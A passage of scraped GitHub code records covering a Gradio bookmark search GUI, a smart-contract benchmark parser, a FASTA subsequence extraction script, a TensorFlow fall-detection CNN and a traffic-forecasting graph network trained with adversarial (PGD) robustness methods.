To Add\",info=\"Enter the URL you wish to add\",scale=5)\n with gr.Tab(\"Search Bookmarks\"):\n with gr.Row():\n search_term = gr.Textbox(label=\"Search Term\")\n with gr.Row():\n search_results = gr.Dataframe(label=\"Search Results\",headers=['URL','Summary'],wrap=True)\n with gr.Row():\n webpage_markdown = gr.Markdown()\n search_term.submit(search_db,search_term,search_results)\n search_results.select(get_markdown,search_results,webpage_markdown)\n\n\ndemo.launch(inbrowser=False,server_name=\"0.0.0.0\")","repo_name":"ChadDa3mon/lynx","sub_path":"app/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12122512718","text":"import os, glob\nimport bm.unify, bm.io, bm.log, bm.solidity\n\ndef process(dataset, source, destination):\n benchmarks = set()\n for fn_bin in sorted(glob.glob(os.path.join(source,\"examples\",\"*\",\"verified_contract_bins\",\"*\"))):\n fn_list = fn_bin.split(os.sep)\n name,ext = os.path.splitext(fn_list[-1])\n vuln = fn_list[-3]\n\n bid = f\"{name}-{vuln}\"\n assert bid not in benchmarks\n benchmarks.add(bid)\n\n assert ext in (\".bin\",\".bin-runtime\")\n bytecode,runtime = (fn_bin,None) if ext == \".bin\" else (None,fn_bin)\n\n sol,etc = None,None\n for sol_base in (name,f\"{name}.sol\"):\n fn_sol = os.path.join(source,\"examples\",vuln,\"verified_contract_sols\",sol_base)\n if not os.path.isfile(fn_sol):\n continue\n src = bm.io.read_string(fn_sol)\n if bm.solidity.is_broken(src):\n bm.log.warn(f\"{fn_sol}: Broken Solidity file\")\n # Some source files are broken (are just \"None\" or miss line breaks)\n etc = { \"broken source\": os.path.join(\"examples\",vuln,\"verified_contract_sols\",os.path.basename(fn_sol)) }\n continue\n assert not sol\n sol = fn_sol\n\n bm.unify.save(destination, dataset, bid, [(vuln,True)],\n sol = sol,\n bytecode = bytecode,\n runtime = runtime,\n etc = etc)\n","repo_name":"gsalzer/cgt","sub_path":"construction/scripts/bm/parsers/ContractFuzzer.py","file_name":"ContractFuzzer.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"33506713516","text":"#!/usr/bin/env python3.5\n# Fredrik Boulund 2016\n# Extract sub sequences from a FASTA file using ranges\n# added to FASTA headers by Easel bash pipeline.\n\nfrom read_fasta import read_fasta\nfrom sys import argv, exit, stdout\nfrom collections import namedtuple, OrderedDict\nimport argparse\n\n\ndef parse_args(argv):\n \"\"\"\n Parse commandline arguments.\n \"\"\"\n\n desc = \"\"\"Extract sub sequences from FASTA files. Fredrik Boulund 2016\"\"\"\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument(\"PFA\",\n help=\"Protein FASTA file to read headers with range information from.\")\n parser.add_argument(\"NFA\",\n help=\"Nucleotide FASTA file to read sub sequences from.\")\n parser.add_argument(\"-p\", \"--prefix\", \n help=\"FASTA header prefix to replace previous header with.\")\n parser.add_argument(\"-o\", \"--outfile\", metavar=\"FILE\", dest=\"outfile\",\n default=\"\",\n help=\"Write output to FILE instead of STDOUT.\")\n\n if len(argv)<2:\n parser.print_help()\n exit()\n \n options = parser.parse_args()\n return options\n\n\ndef extract_subsequence_records(fastafile):\n \"\"\"\n Extract sub sequence records (reading frame and start, end) from FASTA headers.\n\n The following format of headers is expected:\n >NODE_60_length_635_cov_2.53448_ID_19982_5/10-212\n ^ ^ ^\n | | End\n | Start\n Reading frame\n The start and end in the header are 1-based in protein sequence coordinates.\n The function returns the equivalent 0-based nucleotide sequence coordinates.\n \"\"\"\n\n Subsequence_Record = namedtuple(\"Subsequence_Record\", \"frame, start, end\")\n subsequence_records = OrderedDict()\n for long_header, sequence in read_fasta(fastafile, keep_formatting=False):\n header, frame_start_end = long_header.rsplit(\"_\", 1)\n frame, start_end = frame_start_end.split(\"/\")\n start, end = start_end.split(\"-\")\n subseq_rec = Subsequence_Record(int(frame), int(start)*3-3, int(end)*3-3)\n subsequence_records[header] = subseq_rec\n return subsequence_records\n\n\ndef revcomp(sequence):\n \"\"\"\n Return the reverse complement of DNA sequence.\n \"\"\"\n return sequence.upper().translate(str.maketrans(\"ACGT\", \"TGCA\"))[::-1]\n\n\ndef extract_subseq(sequence, subseq): #frame, start, end):\n \"\"\"\n Extract subsequence from a sequence string.\n\n This follows EMBOSS transeq's implementation on how\n reading frames are interpreted. The starting position\n of the reverse complement is adjusted based on the \n total length of the sequence modulo 3, so that the\n reverse frames correspond to the same position of the \n frames in the forward sequence.\n \"\"\"\n reverse_adjustment = len(sequence) % 3\n if subseq.frame == 1:\n return sequence[subseq.start:subseq.end]\n elif subseq.frame == 2:\n return sequence[1:][subseq.start:subseq.end]\n elif subseq.frame == 3:\n return sequence[2:][subseq.start:subseq.end]\n elif subseq.frame == 4:\n start = subseq.start + reverse_adjustment\n end = subseq.end + reverse_adjustment\n return revcomp(sequence)[start:end]\n elif subseq.frame == 5:\n start = subseq.start + reverse_adjustment\n end = subseq.end + reverse_adjustment\n return revcomp(sequence)[2:][start:end]\n elif subseq.frame == 6:\n start = subseq.start + reverse_adjustment\n end = subseq.end + reverse_adjustment\n return revcomp(sequence)[1:][start:end]\n\n\ndef main(options):\n \"\"\"\n Main function\n \"\"\"\n\n subsequences = extract_subsequence_records(options.PFA)\n nucleotide_sequences = {h: s for h, s in read_fasta(options.NFA, keep_formatting=False)}\n\n if options.outfile:\n outfile = open(options.outfile, 'w')\n else:\n outfile = stdout\n\n with outfile:\n for counter, header_subseq in enumerate(subsequences.items(), start=1):\n header, subseq = header_subseq\n if options.prefix:\n print(\">\"+options.prefix+\"_\"+str(counter), header, subseq, file=outfile)\n else:\n print(\">\"+header, subseq, file=outfile)\n e_subseq = extract_subseq(nucleotide_sequences[header], subseq) \n print(e_subseq, file=outfile)\n\n\nif __name__ == \"__main__\":\n options = parse_args(argv)\n main(options)\n","repo_name":"boulund/qnr-assembly","sub_path":"extract_nucleotide_ranges.py","file_name":"extract_nucleotide_ranges.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12675447756","text":"# -*- coding:UTF-8 -*-\n\n'''\nCNN Model\n'''\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport dataset\nimport pandas as pd\nimport sys\n\nsys.path.insert(0, '../utils/')\nimport transform\n\nMODEL_SEVE_PATH = '../model/model.ckpt'\n# Label = {'STD':1,'WAL':2,'JOG':3,'JUM':4,'STU':5,'STN':6,'SCH':7,'SIT':8,'CHU':9,\n# 'CSI':10,'CSO':11,'LYI':12,'FOL':0,'FKL':0,'BSC':0,'SDL':0}\n\nLabel = {0:'Fall',1:'Stand',2:'Walk',3:'Jog',4:'Jump',5:'up_stair',6:'down_stair',\n 7:'stand2sit',8:'sitting',9:'sit2stand',10:'CSI',11:'CSO',12:'LYI'}\n\n# Hyperparameter\nCLASS_LIST = [0,2,3,4,5,6,7,9]\nCLASS_NUM = len(CLASS_LIST)\nLEARNING_RATE = 0.001\nTRAIN_STEP = 10000\nBATCH_SIZE = 50\n\ndef wights_variable(shape):\n '''\n Weight variable tensor\n :param shape:\n :return:\n '''\n wights = tf.truncated_normal(shape=shape,stddev=0.1)\n return tf.Variable(wights,dtype=tf.float32)\n\ndef biases_variable(shape):\n '''\n Bias variable tensor\n :param shape:\n :return:\n '''\n bias = tf.constant(0.1,shape=shape)\n return tf.Variable(bias,dtype=tf.float32)\n\ndef conv2d(x,kernel):\n '''\n Network convolution layer\n :param x: Enter x\n :param kernel: Convolution kernel\n :return: Return the result after convolution\n '''\n return tf.nn.conv2d(x,kernel,strides=[1,1,1,1],padding='SAME')\n\ndef max_pooling_2x2(x):\n '''\n Maximum reddish layer\n :param x: Enter x\n :return: Return pooled data\n '''\n return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\n\ndef lrn(x):\n '''\n local response normalization\n Normalized local response can improve accuracy\n :param x: Enter x\n :return:\n '''\n\n return tf.nn.lrn(x,4,1.0,0.001,0.75)\n\n\ndef fall_net(x):\n '''\n Fell to detection network\n :param x: Enter tensor,shape=[None,]\n :return:\n '''\n\n with tf.name_scope('reshape'):\n x = tf.reshape(x,[-1,20,20,3])\n x = x / 255.0 * 2 - 1\n\n with tf.name_scope('conv1'):\n # value shape:[-1,18,18,32]\n conv1_kernel = wights_variable([5,5,3,32])\n conv1_bias = biases_variable([32])\n conv1_conv = conv2d(x,conv1_kernel)+conv1_bias\n conv1_value = tf.nn.relu(conv1_conv)\n\n with tf.name_scope('max_pooling_1'):\n # value shape:[-1,10,10,32]\n mp1 = max_pooling_2x2(conv1_value)\n\n with tf.name_scope('conv2'):\n # value shape:[-1,8,8,64]\n conv2_kernel = wights_variable([5,5,32,64])\n conv2_bias = biases_variable([64])\n conv2_conv = conv2d(mp1,conv2_kernel)+conv2_bias\n conv2_value = tf.nn.relu(conv2_conv)\n\n with tf.name_scope('max_pooling_2'):\n # value shape:[-1,5,5,64]\n mp2 = max_pooling_2x2(conv2_value)\n\n with tf.name_scope('fc1'):\n fc1_wights = wights_variable([5*5*64,512])\n fc1_biases = biases_variable([512])\n\n fc1_input = tf.reshape(mp2,[-1,5*5*64])\n fc1_output = tf.nn.relu(tf.matmul(fc1_input,fc1_wights)+fc1_biases)\n\n with tf.name_scope('drop_out'):\n keep_prob = tf.placeholder(dtype=tf.float32)\n drop_out = tf.nn.dropout(fc1_output,keep_prob)\n\n with tf.name_scope('fc2'):\n fc2_wights = wights_variable([512,CLASS_NUM])\n fc2_biases = biases_variable([CLASS_NUM])\n fc2_output = tf.matmul(drop_out,fc2_wights)+fc2_biases\n\n return fc2_output,keep_prob\n\n\ndef train_model():\n '''\n Train the model and save the trained model parameters\n :return: Return the trained model parameters\n '''\n with tf.name_scope('input_dataset'):\n x = tf.placeholder(tf.float32,[None,1200])\n y = tf.placeholder(tf.float32,[None,CLASS_NUM])\n y_,keep_prob = fall_net(x)\n\n with tf.name_scope('loss'):\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=y_)\n loss = tf.reduce_mean(cross_entropy)\n tf.summary.scalar(\"loss\", loss)\n\n with tf.name_scope('optimizer'):\n train = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)\n\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_,1),tf.argmax(y,1))\n correct_prediction = tf.cast(correct_prediction,tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n tf.summary.scalar(\"accuracy\", accuracy)\n\n data = dataset.DataSet('../data/dataset',CLASS_LIST)\n saver = tf.train.Saver()\n merged = tf.summary.merge_all()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n train_writer = tf.summary.FileWriter(\"../log/\", sess.graph)\n\n for step in range(1, TRAIN_STEP+1):\n batch_x, batch_y = data.next_batch(BATCH_SIZE)\n if step%100==0:\n train_accuracy = accuracy.eval(feed_dict={x: batch_x, y: batch_y, keep_prob: 1.0})\n print('Training %d times, the accuracy rate is %f' % (step, train_accuracy))\n summ = sess.run(merged, feed_dict={x: batch_x, y: batch_y,keep_prob: 1.0})\n train_writer.add_summary(summ, global_step=step)\n\n train.run(feed_dict={x: batch_x, y: batch_y, keep_prob: 0.5})\n\n train_writer.close()\n save_path = saver.save(sess, MODEL_SEVE_PATH)\n print(\"After training, the weights are saved to:%s\"%(save_path))\n\ndef test_model():\n '''\n Use the test data set to test the trained model\n :return: Test Results\n '''\n data = dataset.DataSet('../data/dataset', CLASS_LIST, True)\n test_x, test_y = data.get_test_data()\n\n tf.reset_default_graph()\n with tf.name_scope('input'):\n x = tf.placeholder(tf.float32,[None,1200])\n y = tf.placeholder(tf.float32,[None,CLASS_NUM])\n y_,keep_prob = fall_net(x)\n\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_,1),tf.argmax(y,1))\n correct_prediction = tf.cast(correct_prediction,tf.float32)\n accuracy = tf.reduce_mean(correct_prediction)\n\n start_time = time.time()\n\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, \"../model/model.ckpt\")\n p_y = np.argmax(sess.run(y_,feed_dict={x: test_x,keep_prob: 1.0}),1)\n print(\"Accuracy rate %f\" % accuracy.eval(feed_dict={x: test_x, y: test_y, keep_prob: 1.0}))\n\n test_time = str(time.time() - start_time)\n print('Test time is:',test_time)\n\n g_truth = np.argmax(test_y,1)\n avg_sensitivity = 0\n avg_specificity = 0\n\n for i in range(CLASS_NUM):\n accuracy,sensitivity,specificity = evaluate(p_y,g_truth,i)\n print('class:%10s,accuracy =%05f,sensitivity =%05f,specificity =%05f'%(Label[CLASS_LIST[i]],accuracy,sensitivity,specificity))\n avg_sensitivity += sensitivity\n avg_specificity += specificity\n\n avg_sensitivity = avg_sensitivity/CLASS_NUM\n avg_specificity = avg_specificity/CLASS_NUM\n\n print('avg_sensitivity=%05f,avg_specificity=%05f'%(avg_sensitivity,avg_specificity))\n\ndef evaluate(p,g,class_):\n fall_index = []\n data_size = g.size\n for i in range(data_size):\n if g[i] ==class_:\n fall_index.append(i)\n fall_num = len(fall_index)\n\n TP = 0\n FN = 0\n for i in range(fall_num):\n index = fall_index[i]\n if p[index] == g[index]:\n TP+=1\n else:\n FN+=1\n sensitivity = TP/(TP+FN)\n\n\n FP =0\n TN =0\n for i in range(data_size):\n if g[i]!=class_:\n if p[i] == class_:\n FP+=1\n else:\n TN+=1\n\n specificity = TN/(FP+TN)\n\n accuracy = (TP+TN)/(FP+TN+TP+FN)\n return accuracy,sensitivity,specificity\n tf.losses.sigmoid_cross_entropy()\n\n\n\ndef demo_run():\n #TODO:\n TEST_DATA = transform.main()\n # TEST_DATA = '../data/dataset/fall_data_abhi.csv'\n # TEST_DATA = '../data/dataset/0_fall_data.csv'\n # TEST_DATA = '../data/test.csv'\n _test_x = []\n _test_y = []\n entry = 1\n class_list = CLASS_LIST\n class_num = CLASS_NUM\n # all_data = pd.read_csv(TEST_DATA,index_col=False)\n all_data = TEST_DATA\n\n if all_data.shape!=[1,1200]:\n print('Illegal data format:', all_data.shape)\n\n print(\"iput data:\", all_data.shape)\n # label = all_data.iloc[entry, 0]\n # print(\"label\", label)\n # _test_y.append(label)\n _test_x.append(all_data.iloc[0, 0:1200])\n test_x = np.array(_test_x)\n # test_x = all_data.iloc[0, 0:1200]\n # test_y = np.array(_test_y)\n print(_test_x)\n print(test_x)\n \n print(test_x.shape)\n # print(test_y)\n\n tf.reset_default_graph()\n with tf.name_scope('input'):\n x = tf.placeholder(tf.float32,[None,1200])\n y = tf.placeholder(tf.float32,[None,CLASS_NUM])\n y_,keep_prob = fall_net(x)\n\n start_time = time.time()\n\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, \"../model/model.ckpt\")\n p_y = np.argmax(sess.run(y_,feed_dict={x: test_x,keep_prob: 1.0}),1)\n print(\"************** prediction:\", p_y)\n \n\n\n\n\nif __name__=='__main__':\n\n # train_model()\n # test_model()\n\n\n demo_run()\n","repo_name":"Ruksana-RASHEED/FD-CNN-1","sub_path":"src/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":8978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24931948461","text":"import os\nimport argparse\nimport shutil\nimport yaml\nfrom mmcv import Config\nimport pickle as pk\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport time\nfrom utils.data_utils import mae\n\nfrom models.astgcn import ASTGCN\nfrom models.stgcn import STGCN\n\nfrom models.GraphWaveNet import gwnet\n\nfrom models.PolicyAttentionNet import STPolicyAttentionNet\n\nfrom attacks.other_attacks import _ST_pgd_whitebox\nimport copy\nfrom utils.env import get_root_logger, set_random_seed, set_default_configs, \\\n init_dist, logger_info\nfrom datasets.datasets import METRLA, HKSPEED,PeMS, PeMSD4\nfrom torch.utils.data import DataLoader\nfrom datasets.datasets import DataLoaderX\n\nfrom methods.train_modes import plain_train, ST_pgd_adv_policy_Atten_train, ST_pgd_adv_policy_Atten_offine_train, \\\nST_pgd_adv_policy_Atten_dist_offline_train\n\nparser = argparse.ArgumentParser(description='STGCN')\nparser.add_argument('--enable-cuda', action='store_true',\n help='Enable CUDA')\nparser.add_argument('--gpu', default=6, type=int,\n help='which gpu to use')\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\nparser.add_argument('--seed', type=int, default= 24, metavar='S',\n help='random seed (default: 24)')\nparser.add_argument('--rename', '-r', action='store_true', default=False,\n help='whether allow renaming the checkpoints parameter to match')\nparser.add_argument('--launcher', choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none', help='job launcher')\nparser.add_argument('--local_rank', type=int, default=0)\nparser.add_argument('--use_gpu',action='store_true',default=True,\n help='ables cCUDA training')\nparser.add_argument('config',\n default='E:/Project/Robust_STGCN/configs/METRLA/METRLA-train0.6-val0.2-test0.2-standard-stgcn.yaml',\n help='path to config file')\nparser.add_argument('--mode', '-a', default='TRAIN', # ['TRAIN', 'TEST']\n help='which attack to perform')\nparser.add_argument('--device_id', '-d', default= 2, type=int,# ['TRAIN', 'TEST']\n help='device ID')\nimport os\n\n\nargs = parser.parse_args()\nset_random_seed(args.seed)\n\nargs.device = None\nif args.enable_cuda and torch.cuda.is_available():\n args.device = torch.device('cuda')\nelse:\n args.device = torch.device('cpu')\n# init distributed env first, since logger depends on the dist info.\nif args.launcher == 'none':\n distributed = False\n device = torch.device(\"cuda\")\nelse:\n distributed = True\n init_dist(args.launcher)\n local_rank = torch.distributed.get_rank()\n # torch.cuda.set_device(local_rank)\n device = torch.device(\"cuda\", local_rank)\nprint(\"Using\", torch.cuda.device_count(), \"GPUs.\")\nargs.device = torch.device('cuda')\nprint(\"Using \", args.device)\nwith open(args.config) as cf:\n cfgs = Config(yaml.safe_load(cf))\nif not os.path.exists(cfgs.model_dir):\n os.makedirs(cfgs.model_dir)\ntorch.backends.cudnn.benchmark = True\ntorch.cuda.set_device(args.device_id)\nshutil.copyfile(args.config, os.path.join(cfgs.model_dir, args.config.split('/')[-1]))\nset_default_configs(cfgs)\n# setup logger\nlogger = get_root_logger(cfgs.log_level, cfgs.model_dir)\nlogger_info(logger, distributed, \"Loading config file from {}\".format(args.config))\nlogger_info(logger, distributed, \"Models saved at {}\".format(cfgs.model_dir))\n\nif cfgs.dataset == 'METRLA':\n\n train_data = METRLA(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = METRLA(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = METRLA(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n\nelif cfgs.dataset == 'HKSPEED':\n\n train_data = HKSPEED(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = HKSPEED(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = HKSPEED(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\nelif cfgs.dataset == 'PeMS':\n\n train_data = PeMS(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = PeMS(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = PeMS(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\nelif cfgs.dataset == 'PeMSD4':\n\n train_data = PeMSD4(mode='train',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n val_data = PeMSD4(mode='val',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\n test_data = PeMSD4(mode='test',\n split_train=cfgs.split_train,\n split_val=cfgs.split_val,\n num_timesteps_input=cfgs.num_timesteps_input,\n num_timesteps_output=cfgs.num_timesteps_output)\nelse:\n raise NameError\n\n\n\n\n\n\ntrain_loader = DataLoaderX(train_data, batch_size=cfgs.batch_size, shuffle=True, num_workers =8, pin_memory=True)\nval_loader = DataLoaderX(val_data, batch_size=cfgs.batch_size, shuffle=False, num_workers =8, pin_memory=True)\ntest_loader = DataLoaderX(test_data, batch_size=cfgs.batch_size, shuffle=False)\n\ndef train(epoch, logger,train_loader, val_loader, net,optimizer,policynet, policy_optimizer, A_wave, A, loss_criterion, max_speed, edges, edge_weights):\n \"\"\"\n Trains one epoch with the given data.\n :param training_input: Training inputs of shape (num_samples, num_nodes,\n num_timesteps_train, num_features).\n :param training_target: Training targets of shape (num_samples, num_nodes,\n num_timesteps_predict).\n :param batch_size: Batch size to use during training.\n :return: Average loss for this epoch.\n \"\"\"\n start = time.time()\n samples_total = len(train_loader) * cfgs.batch_size\n epoch_training_losses = 0\n epoch_training_losses_len = 0\n epoch_rewarding_losses = 0\n epoch_rewarding_losses_len = 0\n save_checkpoint_methods = [\"AT_policy_atten_dist_offline\"]\n if cfgs.train_mode in save_checkpoint_methods:\n if epoch > 1:\n # load last epoch as the student model\n teacher_model_path = cfgs.model_dir + '/epoch{}.pt'.format(epoch - 1)\n logger.info('Loading teacher model from checkpoint from %s', teacher_model_path)\n teacher_model = copy.deepcopy(net).to(device)\n teacher_model.load_state_dict(torch.load(teacher_model_path))\n teacher_model.eval()\n else:\n teacher_model = None\n\n for batch_idx, (data, target) in enumerate(train_loader):\n\n net.train()\n optimizer.zero_grad()\n\n\n X_batch, y_batch = data, target\n X_batch = X_batch.to(device=args.device)\n y_batch = y_batch.to(device=args.device)\n\n\n loss_params = dict(\n model=net, x_natural=X_batch ,A_wave=A_wave, edges = edges, edge_weights= edge_weights, y=y_batch ,\n optimizer=optimizer,step_size=cfgs.train_step_size, epsilon=cfgs.train_epsilon,\n perturb_steps=cfgs.train_num_steps, distance=cfgs.distance,\n rand_start_mode=cfgs.rand_start_mode,rand_start_step=cfgs.rand_start_step,\n K = int(cfgs.train_attack_nodes * A_wave.size(0)),\n find_type = cfgs.find_type\n )\n if 'plain' == cfgs.train_mode:\n loss = plain_train(**loss_params)\n elif \"AT_policy_atten\" == cfgs.train_mode:\n extr_params = dict(\n policynet=policynet,\n policy_optimizer = policy_optimizer,\n device = device,\n num_samples = cfgs.num_samples,\n constant = cfgs.constant,\n is_known_first_node = cfgs.is_known_first_node,\n baseline = cfgs.baseline\n )\n loss,reward = ST_pgd_adv_policy_Atten_train(**loss_params,**extr_params)\n epoch_rewarding_losses += reward\n epoch_rewarding_losses_len += 1\n train_reward = epoch_rewarding_losses / epoch_rewarding_losses_len\n elif \"AT_policy_atten_dist_offline\" == cfgs.train_mode:\n extr_params = dict(\n policynet=policynet,\n device = device,\n alpha_reg = cfgs.alpha_reg,\n teacher_model = teacher_model,\n epoch = epoch\n )\n loss = ST_pgd_adv_policy_Atten_dist_offline_train(**loss_params,**extr_params)\n\n elif \"AT_policy_atten_offine\" == cfgs.train_mode:\n extr_params = dict(\n policynet=policynet,\n device = device,\n )\n loss = ST_pgd_adv_policy_Atten_offine_train(**loss_params,**extr_params)\n else:\n raise NameError\n\n loss.backward()\n optimizer.step()\n\n\n\n epoch_training_losses += loss.detach().cpu().numpy()\n epoch_training_losses_len += 1\n train_loss = epoch_training_losses / epoch_training_losses_len\n\n\n # print progress\n if batch_idx % cfgs.log_interval == 0:\n logger_info(logger, distributed,\n 'Epoch: {} [{}/{} ({:.0f}%)] Train Loss: {:.4f} time:{:.3f}'.format(\n epoch, batch_idx * len(data), samples_total,\n 100. * batch_idx / len(train_loader),\n train_loss,\n time.time() - start))\n\n\n\n\n\n if cfgs.train_mode in save_checkpoint_methods:\n torch.save(net.state_dict(),\n os.path.join(cfgs.model_dir, 'epoch{}.pt'.format(epoch)))\n save_checkpoint_methods_policy = [\"AT_policy_atten\"]\n if cfgs.train_mode in save_checkpoint_methods_policy:\n torch.save(policynet.state_dict(),\n os.path.join(cfgs.model_dir, 'policy_epoch{}.pt'.format(epoch)))\n else:\n train_reward = None\n val_loss, val_predict, val_target = eval_val(\n val_loader,\n net, A_wave,A,\n edges,\n edge_weights,\n loss_criterion)\n val_predict, val_target = val_predict * max_speed, val_target * max_speed\n\n mae_score = mae(val_predict, val_target)\n # print progress\n if batch_idx % cfgs.log_interval == 0:\n logger_info(logger, distributed,\n 'Epoch: {} Train Loss: {:.4f} Val Loss: {:.4f} MAE: {:.4f} time:{:.3f}'.format(epoch,\n train_loss,\n val_loss,\n mae_score,\n time.time() - start))\n\n return train_loss, val_loss, mae_score, train_reward\n\ndef eval_val(val_loader,net, A_wave, A, edges, edge_weights, loss_criterion):\n \"\"\"\n Trains one epoch with the given data.\n :param training_input: Training inputs of shape (num_samples, num_nodes,\n num_timesteps_train, num_features).\n :param training_target: Training targets of shape (num_samples, num_nodes,\n num_timesteps_predict).\n :param batch_size: Batch size to use during training.\n :return: Average loss for this epoch.\n \"\"\"\n\n net.eval()\n with torch.no_grad():\n val_predict = []\n val_target = []\n epoch_val_losses = []\n for batch_idx, (data, target) in enumerate(val_loader):\n X_batch, y_batch = data, target\n X_batch = X_batch.to(device=args.device)\n y_batch = y_batch.to(device=args.device)\n\n if cfgs.backbone == \"RobustGWNET\":\n out, _ = net(X_batch, A_wave, edges, edge_weights)\n else:\n out = net(X_batch,A_wave, edges, edge_weights)\n\n\n loss = loss_criterion(out, y_batch)\n epoch_val_losses.append(loss.detach().cpu().numpy())\n val_predict.append(out.detach().cpu().numpy())\n val_target.append(y_batch.detach().cpu().numpy())\n\n val_predict = np.vstack(val_predict)\n val_target = np.vstack(val_target)\n return sum(epoch_val_losses)/len(epoch_val_losses), val_predict, val_target\n\ndef eval_val_pgd(val_loader,net, A_wave, A, edges, edge_weights, loss_criterion, max_speed, cfgs):\n \"\"\"\n Trains one epoch with the given data.\n :param training_input: Training inputs of shape (num_samples, num_nodes,\n num_timesteps_train, num_features).\n :param training_target: Training targets of shape (num_samples, num_nodes,\n num_timesteps_predict).\n :param batch_size: Batch size to use during training.\n :return: Average loss for this epoch.\n \"\"\"\n train_attack_nodes = int(cfgs.train_attack_nodes * len(A_wave))\n net.eval()\n with torch.no_grad():\n val_predict = []\n val_target = []\n epoch_val_losses = []\n adv_pgd_val_predict = []\n for batch_idx, (data, target) in enumerate(val_loader):\n X_batch, y_batch = data, target\n X_batch = X_batch.to(device=args.device)\n y_batch = y_batch.to(device=args.device)\n\n\n out = net(X_batch,A_wave, edges, edge_weights)\n\n _, X_pgd, index = _ST_pgd_whitebox(net,\n X_batch,\n y_batch,\n A_wave,\n A,\n edges,\n edge_weights,\n train_attack_nodes,\n cfgs.train_epsilon,\n cfgs.train_num_steps,\n cfgs.random,\n cfgs.train_step_size,\n find_type='random')\n\n adv_pgd_out = net(X_pgd, A_wave, edges, edge_weights)\n\n\n loss = loss_criterion(out, y_batch)\n epoch_val_losses.append(loss.detach().cpu().numpy())\n val_predict.append(out.detach().cpu().numpy())\n val_target.append(y_batch.detach().cpu().numpy())\n adv_pgd_val_predict.append(adv_pgd_out.detach().cpu().numpy())\n\n val_predict = np.vstack(val_predict)\n val_target = np.vstack(val_target)\n adv_pgd_val_predict = np.vstack(adv_pgd_val_predict)\n\n return sum(epoch_val_losses)/len(epoch_val_losses), val_predict, val_target, adv_pgd_val_predict, index\n\ndef main():\n adj = train_data.A\n A = train_data.A.to(device=args.device)\n A_wave = train_data.A_wave.to(device=args.device)\n\n edges = train_data.edges.to(device=args.device)\n edge_weights = train_data.edge_weights.to(device=args.device)\n max_speed = train_data.max_speed\n\n\n\n if cfgs.backbone == 'STGCN':\n model = STGCN(A_wave.shape[0],\n cfgs.num_features,\n cfgs.num_timesteps_input,\n cfgs.num_timesteps_output).to(device=args.device)\n elif cfgs.backbone == 'ASTGCN':\n model_params = {\n 'nb_time_strides': 1,\n 'nb_block': 2,\n 'K': 3,\n 'nb_chev_filter': 64,\n 'nb_time_filter': 64}\n\n model = ASTGCN(\n nb_block= model_params['nb_block'],\n in_channels = cfgs.num_features,\n K = model_params['K'],\n nb_chev_filter = model_params['nb_chev_filter'],\n nb_time_filter = model_params['nb_time_filter'],\n time_strides = model_params['nb_time_strides'],\n num_for_predict = cfgs.num_timesteps_output,\n len_input = cfgs.num_timesteps_input,\n num_of_vertices = A_wave.shape[0],\n normalization = None,\n bias = True,\n ).to(device=args.device)\n elif cfgs.backbone == 'GWNET':\n dropout = 0.3\n supports = None\n gcn_bool = True\n addaptadj = True\n aptinit = None\n nhid = 32\n model = gwnet(device, num_nodes=cfgs.num_nodes, dropout=dropout, supports=supports, gcn_bool=gcn_bool,\n addaptadj=addaptadj, aptinit=aptinit, in_dim=cfgs.num_features, 